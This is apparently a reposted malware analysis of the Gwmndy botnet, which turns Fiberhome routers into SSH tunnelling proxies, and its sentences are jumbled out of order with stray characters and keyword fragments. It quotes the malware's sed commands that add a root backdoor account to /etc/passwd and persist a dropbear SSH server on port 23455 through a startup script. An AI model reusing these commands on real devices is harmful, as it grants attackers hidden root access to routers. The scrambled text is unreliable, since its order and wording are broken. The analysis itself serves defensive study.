#ps | grep "dropbear" | grep -v "dropbear -p" | awk ''`ĮLF 32-bit MSB executable, MIPS, MIPS32 version 1 (SYSV), statically linked, not stripped Sed -i '/killall dropbear/a\/fh/vpnip &' /fh/extend/userapp.sh Sed -i '2c admin:x:0:0:root:/root:/bin/sh' /etc/passwd Sed -i '/killall dropbear/a\/fh/dropbear -p 23455 &' /fh/extend/userapp.sh Sed -i '/killall dropbear/a\dropbear -p 23455 &' /fh/extend/userapp.sh It also tampers with the shadow file to add the backdoor account, and runs vpnip (see below) and an open source port forwarder program rinetd. We can clearly see that the attacker runs the dropbear program on the target router and adds the startup command to the /fh/extend/userapp.sh file. POSIX shell script text executable, ASCII text Gwmndy Reverse Analysis vpn.sh sample information Gwmndy contains mainly vpn.sh, Reporter and SSH Client programs, and provides a corresponding web interface through a web server to transmit information such as Bot IPs. We named these malware Gwmndy based on the domain name used by the attacker. And create a Socks5 proxy service locally.
MERAKI ROUTER DROPBEAR SSH WINDOWS
The ELF file itself is a Reporter, it periodically obtains the router information such as device IP and uploads them to a remote web interface so the author can get a hold of the device even the router IP changes.Ĭorrespondingly, we also observed that the attacker developed client program on the Windows and Linux platforms, they access a remote Web interface to obtain information such as the device IP reported by the Reporter, and then use backdoor passwords to establish an SSH tunnel (Dynamic Port Forwarding). It seems that the author is satisfied with the number which probably provides enough proxy service for whatever purpose he needs. Also, unlike the typical botnets which try their best to infect as many victims as they can, this one has pretty much stopped looking for new bots after its’ active daily bot number reached low 200. Its’ only purpose is to setup the routers to be SSH tunneling proxy nodes. But it does not do the regular stuff such as DDos, Cryptojacking, Spaming, information stealing. When we further looked into it, we realized it is a component of an IoT botnet targeting Fiberhome router. On July 24, 2019, our Unknown Threat Detection System highlighted a suspicious ELF file with 0 VirusTotal detection.
0 kommentar(er)
